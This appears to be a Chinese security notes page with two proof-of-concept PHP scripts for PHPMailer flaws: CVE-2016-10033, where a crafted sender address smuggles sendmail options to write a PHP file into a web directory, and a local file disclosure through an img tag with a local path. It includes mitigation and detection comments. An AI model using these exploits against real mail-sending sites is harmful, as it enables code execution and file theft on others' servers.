PHPMailer第三方库

命令执行版本 version<5.2.18

poc

<?php
// Reproduction input for CVE-2016-10033 (the identifier used in the Subject below);
// this page lists PHPMailer < 5.2.18 as affected. Intended for a disposable lab install.
//
// The quoted local part hides extra sendmail-style options (-oQ, -X) behind an escaped
// quote. Detection hint: a sender address containing whitespace, an escaped quote, or
// "-X"/"-oQ" should never be accepted by an application and is worth alerting on.
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php some"@email.com';
// Message body; phpinfo() is a benign marker rather than a working payload.
$msg_body = "<?php phpinfo(); ?>";
// ------------------
// mail() param injection via the vulnerability in PHPMailer
require_once('class.phpmailer.php');
$mail = new PHPMailer(); // defaults to using php "mail()"
// The issue is only reachable when the sender passed to SetFrom() is attacker-influenced.
// Mitigation: upgrade PHPMailer past the affected range, validate or hard-code the sender,
// and prefer an SMTP transport so the mail() extra-parameter path is not used.
$mail->SetFrom($email_from, 'Client Name');
$address = "customer_feedback@company-X.com";
$mail->AddAddress($address, "Some User");
$mail->Subject = "PHPMailer PoC Exploit CVE-2016-10033";
$mail->MsgHTML($msg_body);
// Send() reports failure through ErrorInfo. Incident responders should also look for
// unexpected .php files in web-writable cache directories after suspicious mail activity.
if(!$mail->Send()) {
echo "Mailer Error: " . $mail->ErrorInfo;
} else {
echo "Message sent!\n";
}
?>

20.11.21:补充:

其实实际利用起来还是挺难的:触发点是代码中的 $this->Sender 变量,需要 setFrom 方法的支持,而我在网站中并没有发现对该方法的调用

文件读取 version <=5.2.21

poc

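<?php
#Author:Yxlink
// Lab reproduction of the local file disclosure this page lists for PHPMailer <= 5.2.21.
// What it demonstrates: HTML handed to msgHTML() contains an <img> whose src is a local
// filesystem path, and the affected versions appear to embed that file in the outgoing
// message. Defensive takeaways: upgrade PHPMailer past the affected range, never pass
// untrusted HTML to msgHTML(), and review outbound mail for unexpected inline attachments.

require_once('PHPMailerAutoload.php');

// The app password is read from the environment instead of being stored in the script.
// SMTP_APP_PASSWORD is a placeholder variable name chosen for this example.
// The password that was previously hard-coded here must be treated as exposed and revoked.
$smtpPassword = getenv('SMTP_APP_PASSWORD');
if ($smtpPassword === false || $smtpPassword === '') {
    echo "Mailer Error: SMTP_APP_PASSWORD is not set";
    exit(1);
}

$mail = new PHPMailer();
$mail->isSMTP();
$mail->Host = 'smtp.qq.com';
$mail->Port = 465;
$mail->SMTPAuth = true;
$mail->Username = 'xxx@qq.com'; // QQ mailbox account
// 16-character password issued for mail clients; it differs from the QQ account password.
$mail->Password = $smtpPassword;
$mail->SMTPSecure = 'ssl';

$mail->CharSet = "UTF-8";
$mail->Encoding = "base64";

$mail->Subject = "hello";
$mail->From = "xxxx@qq.com";
$mail->FromName = "test";

$address = "xxxx@qq.com";
$mail->AddAddress($address, "test");

$mail->AddAttachment('test.txt', 'test.txt');
$mail->IsHTML(true);
// The local path in src is the untrusted-input stand-in; in a real application this HTML
// would come from a user-controlled field, which is why msgHTML() input must be trusted.
$msg = "<img src='D:\\1.txt'>test";
$mail->msgHTML($msg);

if (!$mail->Send()) {
    echo "Mailer Error: " . $mail->ErrorInfo;
} else {
    echo "Message sent!";
}
?>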